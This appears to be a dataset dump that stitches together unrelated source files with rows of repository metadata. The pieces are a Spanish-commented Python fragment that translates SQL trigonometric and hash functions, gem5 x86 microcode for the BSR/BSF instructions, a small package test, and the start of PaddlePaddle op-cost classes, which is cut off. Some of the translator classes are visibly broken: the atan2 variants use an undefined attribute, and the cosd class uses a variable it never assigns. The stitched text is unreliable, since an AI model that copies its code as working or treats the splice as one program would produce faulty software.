codigo = tr1[0] + '\n'
resultado = mt.acos(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.acos('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_acosdp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.acosd(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.acosd('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_asinp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.asin(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.asin('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_asindp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.asind(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.asind('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_atanp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.atan(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.atan('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_atandp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.atand(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.atand('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_atan2p(pl_mathtrig):
def __init__(self, exp1, exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.atan2(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.atan2('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_atan2dp(pl_mathtrig):
def __init__(self, exp1, exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.atan2d(tr1[2])
tmp = getTemp()
codigo += tmp + '= mt.atan2d('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_cosp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.cos(tr1[2])
tmp = getTemp()
codigo += tmp +' = mt.cos('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_cosdp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.cosd(tr1[2])
codigo += tmp +' = mt.cosd('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_cotp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
tmp = getTemp()
resultado = mt.cot(tr1[2])
codigo += tmp+ ' = mt.cot('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_cotdp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.cotd(tr1[2])
tmp = getTemp()
codigo +=tmp + ' = mt.cotd('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_sinp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.sin(tr1[2])
tmp = getTemp()
codigo += tmp+ ' = mt.sin('+tr1[1]+')'
return codigo,tmp,resultado
class trig_sindp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.sind(tr1[2])
tmp = getTemp()
codigo +=tmp +' = mt.sind('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_tanp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.tan(tr1[2])
tmp = getTemp()
codigo +=tmp +' = mt.tan('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_tandp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.tand(tr1[2])
tmp = getTemp()
codigo += tmp +' = mt.tand('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_sinhp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.sinh(tr1[2])
tmp = getTemp()
codigo += tmp +' = mt.sinh('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_coshp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.cosh(tr1[2])
tmp = getTemp()
codigo += tmp +' = mt.cosh('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_tanhp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.tanh(tr1[2])
tmp = getTemp()
codigo +=tmp+ ' = mt.tanh('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_asinhp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.asinh(tr1[2])
tmp = getTemp()
codigo += tmp + ' = mt.asinh('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_acoshp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.acosh(tr1[2])
tmp = getTemp()
codigo += tmp +' = mt.acosh('+tr1[1]+')'
return codigo,tmp,resultado
class trig_atanhp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.atanh(tr1[2])
tmp = getTemp()
codigo +=tmp +' = mt.atanh('+tr1[1]+')\n'
return codigo,tmp,resultado
class pl_function():
''' clase abstracta '''
class fun_lengthp(pl_function):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = len(str(tr1[2]))
tmp = getTemp()
codigo += tmp +' = len(str('+tr1[1]+'))\n'
return codigo,tmp,resultado
class fun_trimp(pl_function):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = str(tr1[2]).strip()
tmp = getTemp()
codigo += tmp +' = str('+tr1[1]+').strip()\n'
return codigo,tmp,resultado
class fun_md5p(pl_function):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
crypt = hashlib.md5()
crypt.update(tr1[2].encode('utf-8'))
resultado = crypt.hexdigest()
codigo += 'crypt = hashlib.md5()\n'
codigo += 'crypt.update('+tr1[1]+'.encode(\'utf-8\'))\n'
tmp = getTemp()
codigo +=tmp +' = crypt.hexdigest()\n'
return codigo,tmp,resultado
class fun_sha256p(pl_function):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
crypt = hashlib.sha256()
crypt.update(tr1[2].encode('utf-8'))
resultado = crypt.hexdigest()
codigo += 'crypt = hashlib.sha256()\n'
codigo += 'crypt.update('+tr1[1]+'.encode(\'utf-8\'))\n'
tmp = getTemp()
codigo += tmp +' = crypt.hexdigest()\n'
return codigo,tmp,resultado
class fun_convertp(pl_function):
def __init__ (self,exp,tipo,alias):
self.exp = exp
self.type = tipo
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = tr1[2] + '\n'
valor = tr1[1] + '\n'
return codigo,valor,resultado
def ejecutar(self,tables):
return self.exp
class fun_substrp(pl_function):
def __init__ (self,exp,min,max,alias):
self.exp = exp
self.min = min
self.max = max
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = str(tr1[2])[self.min:self.max]
tmp = getTemp()
codigo += tmp +' = '+tr1[1]+'['+str(self.min)+':'+str(self.max)+']\n'
return codigo,tmp,resultado
class fun_nowp(pl_function):
def __init__ (self,alias):
self.alias = alias
def traducir(self):
codigo ='\n'
today = date.today()
resultado = today.strftime("%Y-%m-%d %H:%M:%S")
codigo += 'today = date.today()'
valor = 'today.strftime("%Y-%m-%d %H:%M:%S")\n'
return codigo,valor,resultado
class queryf(instruccion):
def __init__(self,callfunc):
self.callfunc = callfunc
def traducir(self):
t = self.callfunc.traducir()
t0 = t[0].replace('\n','\n\t')
return f'\t{t0}print({t[1]})\n'
def ejecutar(self):
return 'Se creo el select' | 30.089337 | 235 | 0.523641 | 7,455 | 62,646 | 4.332529 | 0.052716 | 0.075049 | 0.09734 | 0.111459 | 0.857766 | 0.833989 | 0.808136 | 0.766432 | 0.747175 | 0.700238 | 0 | 0.031355 | 0.327491 | 62,646 | 2,082 | 236 | 30.089337 | 0.735296 | 0.03084 | 0 | 0.734706 | 0 | 0.007268 | 0.103848 | 0.018599 | 0 | 0 | 0 | 0 | 0 | 1 | 0.13083 | false | 0.012114 | 0.005451 | 0.007268 | 0.256814 | 0.006663 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6243a7ff7d77e0c3ef22071ae49e4b71e9235a2c | 9,454 | py | Python | src/arch/x86/isa/insts/general_purpose/compare_and_test/bit_scan.py | qianlong4526888/haha | 01baf923693873c11ae072ce4dde3d8f1d7b6239 | [
"BSD-3-Clause"
] | 135 | 2016-10-21T03:31:49.000Z | 2022-03-25T01:22:20.000Z | src/arch/x86/isa/insts/general_purpose/compare_and_test/bit_scan.py | qianlong4526888/haha | 01baf923693873c11ae072ce4dde3d8f1d7b6239 | [
"BSD-3-Clause"
] | 35 | 2017-03-10T17:57:46.000Z | 2022-02-18T17:34:16.000Z | src/arch/x86/isa/insts/general_purpose/compare_and_test/bit_scan.py | qianlong4526888/haha | 01baf923693873c11ae072ce4dde3d8f1d7b6239 | [
"BSD-3-Clause"
] | 48 | 2016-12-08T12:03:13.000Z | 2022-02-16T09:16:13.000Z | # Copyright (c) 2007-2008 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2008 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop BSR_R_R {
# Determine if the input was zero, and also move it to a temp reg.
mov t1, t1, t0, dataSize=8
and t1, regm, regm, flags=(ZF,)
br label("end"), flags=(CZF,)
# Zero out the result register
movi reg, reg, 0x0
# Bit 6
srli t3, t1, 32, dataSize=8, flags=(EZF,)
ori t4, reg, 0x20
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 5
srli t3, t1, 16, dataSize=8, flags=(EZF,)
ori t4, reg, 0x10
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 4
srli t3, t1, 8, dataSize=8, flags=(EZF,)
ori t4, reg, 0x8
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 3
srli t3, t1, 4, dataSize=8, flags=(EZF,)
ori t4, reg, 0x4
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 2
srli t3, t1, 2, dataSize=8, flags=(EZF,)
ori t4, reg, 0x2
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 1
srli t3, t1, 1, dataSize=8, flags=(EZF,)
ori t4, reg, 0x1
mov reg, reg, t4, flags=(nCEZF,)
end:
fault "NoFault"
};
def macroop BSR_R_M {
mov t1, t1, t0, dataSize=8
ld t1, seg, sib, disp
# Determine if the input was zero, and also move it to a temp reg.
and t1, t1, t1, flags=(ZF,)
br label("end"), flags=(CZF,)
# Zero out the result register
movi reg, reg, 0x0
# Bit 6
srli t3, t1, 32, dataSize=8, flags=(EZF,)
ori t4, reg, 0x20
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 5
srli t3, t1, 16, dataSize=8, flags=(EZF,)
ori t4, reg, 0x10
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 4
srli t3, t1, 8, dataSize=8, flags=(EZF,)
ori t4, reg, 0x8
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 3
srli t3, t1, 4, dataSize=8, flags=(EZF,)
ori t4, reg, 0x4
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 2
srli t3, t1, 2, dataSize=8, flags=(EZF,)
ori t4, reg, 0x2
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 1
srli t3, t1, 1, dataSize=8, flags=(EZF,)
ori t4, reg, 0x1
mov reg, reg, t4, flags=(nCEZF,)
end:
fault "NoFault"
};
def macroop BSR_R_P {
rdip t7
mov t1, t1, t0, dataSize=8
ld t1, seg, riprel, disp
# Determine if the input was zero, and also move it to a temp reg.
and t1, t1, t1, flags=(ZF,)
br label("end"), flags=(CZF,)
# Zero out the result register
movi reg, reg, 0x0
# Bit 6
srli t3, t1, 32, dataSize=8, flags=(EZF,)
ori t4, reg, 0x20
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 5
srli t3, t1, 16, dataSize=8, flags=(EZF,)
ori t4, reg, 0x10
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 4
srli t3, t1, 8, dataSize=8, flags=(EZF,)
ori t4, reg, 0x8
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 3
srli t3, t1, 4, dataSize=8, flags=(EZF,)
ori t4, reg, 0x4
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 2
srli t3, t1, 2, dataSize=8, flags=(EZF,)
ori t4, reg, 0x2
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 1
srli t3, t1, 1, dataSize=8, flags=(EZF,)
ori t4, reg, 0x1
mov reg, reg, t4, flags=(nCEZF,)
end:
fault "NoFault"
};
def macroop BSF_R_R {
# Determine if the input was zero, and also move it to a temp reg.
mov t1, t1, t0, dataSize=8
and t1, regm, regm, flags=(ZF,)
br label("end"), flags=(CZF,)
# Zero out the result register
movi reg, reg, 0
subi t2, t1, 1
xor t1, t2, t1
# Bit 6
srli t3, t1, 32, dataSize=8, flags=(EZF,)
ori t4, reg, 32
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 5
srli t3, t1, 16, dataSize=8, flags=(EZF,)
ori t4, reg, 16
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 4
srli t3, t1, 8, dataSize=8, flags=(EZF,)
ori t4, reg, 8
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 3
srli t3, t1, 4, dataSize=8, flags=(EZF,)
ori t4, reg, 4
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 2
srli t3, t1, 2, dataSize=8, flags=(EZF,)
ori t4, reg, 2
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 1
srli t3, t1, 1, dataSize=8, flags=(EZF,)
ori t4, reg, 1
mov reg, reg, t4, flags=(nCEZF,)
end:
fault "NoFault"
};
def macroop BSF_R_M {
mov t1, t1, t0, dataSize=8
ld t1, seg, sib, disp
# Determine if the input was zero, and also move it to a temp reg.
and t1, t1, t1, flags=(ZF,)
br label("end"), flags=(CZF,)
# Zero out the result register
mov reg, reg, t0
subi t2, t1, 1
xor t1, t2, t1
# Bit 6
srli t3, t1, 32, dataSize=8, flags=(EZF,)
ori t4, reg, 32
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 5
srli t3, t1, 16, dataSize=8, flags=(EZF,)
ori t4, reg, 16
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 4
srli t3, t1, 8, dataSize=8, flags=(EZF,)
ori t4, reg, 8
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 3
srli t3, t1, 4, dataSize=8, flags=(EZF,)
ori t4, reg, 4
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 2
srli t3, t1, 2, dataSize=8, flags=(EZF,)
ori t4, reg, 2
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 1
srli t3, t1, 1, dataSize=8, flags=(EZF,)
ori t4, reg, 1
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
end:
fault "NoFault"
};
def macroop BSF_R_P {
rdip t7
mov t1, t1, t0, dataSize=8
ld t1, seg, riprel, disp
# Determine if the input was zero, and also move it to a temp reg.
and t1, t1, t1, flags=(ZF,)
br label("end"), flags=(CZF,)
# Zero out the result register
mov reg, reg, t0
subi t2, t1, 1
xor t1, t2, t1
# Bit 6
srli t3, t1, 32, dataSize=8, flags=(EZF,)
ori t4, reg, 32
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 5
srli t3, t1, 16, dataSize=8, flags=(EZF,)
ori t4, reg, 16
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 4
srli t3, t1, 8, dataSize=8, flags=(EZF,)
ori t4, reg, 8
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 3
srli t3, t1, 4, dataSize=8, flags=(EZF,)
ori t4, reg, 4
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 2
srli t3, t1, 2, dataSize=8, flags=(EZF,)
ori t4, reg, 2
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 1
srli t3, t1, 1, dataSize=8, flags=(EZF,)
ori t4, reg, 1
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
end:
fault "NoFault"
};
'''
| 26.55618 | 72 | 0.608208 | 1,576 | 9,454 | 3.640863 | 0.140863 | 0.118508 | 0.046358 | 0.106657 | 0.724991 | 0.712443 | 0.712443 | 0.712443 | 0.712443 | 0.710178 | 0 | 0.073048 | 0.262957 | 9,454 | 355 | 73 | 26.630986 | 0.750431 | 0.22583 | 0 | 0.964 | 0 | 0 | 0.991894 | 0 | 0 | 0 | 0.009479 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
62506149ff2fdfde622b98f80a835898e6008ff5 | 155 | py | Python | python/tests/test_packages.py | kennyworkman/replicate | df9358847cdbb3d0e87018511e0a392d750d818a | [
"Apache-2.0"
] | 2 | 2020-11-29T06:18:10.000Z | 2021-06-03T06:05:34.000Z | python/tests/test_packages.py | kennyworkman/replicate | df9358847cdbb3d0e87018511e0a392d750d818a | [
"Apache-2.0"
] | 301 | 2021-02-08T07:29:02.000Z | 2022-03-31T12:05:43.000Z | python/tests/test_packages.py | kennyworkman/replicate | df9358847cdbb3d0e87018511e0a392d750d818a | [
"Apache-2.0"
] | null | null | null | import datetime
from replicate.packages import get_imported_packages
def test_get_imported_packages():
assert "replicate" in get_imported_packages()
| 22.142857 | 52 | 0.832258 | 20 | 155 | 6.1 | 0.55 | 0.270492 | 0.467213 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116129 | 155 | 6 | 53 | 25.833333 | 0.890511 | 0 | 0 | 0 | 0 | 0 | 0.058065 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 1 | 0 | 1.25 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
6556a1110d222ddc03ba76ca89390587467f016e | 42,102 | py | Python | python/paddle/distributed/auto_parallel/cost/comp_op_cost.py | L-Net-1992/Paddle | 4d0ca02ba56760b456f3d4b42a538555b9b6c307 | [
"Apache-2.0"
] | 11 | 2016-08-29T07:43:26.000Z | 2016-08-29T07:51:24.000Z | python/paddle/distributed/auto_parallel/cost/comp_op_cost.py | L-Net-1992/Paddle | 4d0ca02ba56760b456f3d4b42a538555b9b6c307 | [
"Apache-2.0"
] | null | null | null | python/paddle/distributed/auto_parallel/cost/comp_op_cost.py | L-Net-1992/Paddle | 4d0ca02ba56760b456f3d4b42a538555b9b6c307 | [
"Apache-2.0"
] | 1 | 2021-12-09T08:59:17.000Z | 2021-12-09T08:59:17.000Z | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from .base_cost import Cost, register_op_cost, CompOpCost, _g_op_cost_factory
@register_op_cost
class AssignOpCost(CompOpCost):
OP_TYPE = "assign"
def __init__(self, op=None, op_desc=None, cluster=None):
super(AssignOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class AssignValueOpCost(CompOpCost):
OP_TYPE = "assign_value"
def __init__(self, op=None, op_desc=None, cluster=None):
super(AssignValueOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class BeamSearchOpCost(CompOpCost):
OP_TYPE = "beam_search"
def __init__(self, op=None, op_desc=None, cluster=None):
super(BeamSearchOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class BeamSearchDecodeOpCost(CompOpCost):
OP_TYPE = "beam_search_decode"
def __init__(self, op=None, op_desc=None, cluster=None):
super(BeamSearchDecodeOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class CastOpCost(CompOpCost):
OP_TYPE = "cast"
def __init__(self, op=None, op_desc=None, cluster=None):
super(CastOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ConcatOpCost(CompOpCost):
OP_TYPE = "concat"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ConcatOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseAddOpCost(CompOpCost):
OP_TYPE = "elementwise_add"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseAddOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseAddGradOpCost(CompOpCost):
OP_TYPE = "elementwise_add_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseAddGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseDivOpCost(CompOpCost):
OP_TYPE = "elementwise_div"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseDivOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseDivGradOpCost(CompOpCost):
OP_TYPE = "elementwise_div_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseDivGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseMulOpCost(CompOpCost):
OP_TYPE = "elementwise_mul"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseMulOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
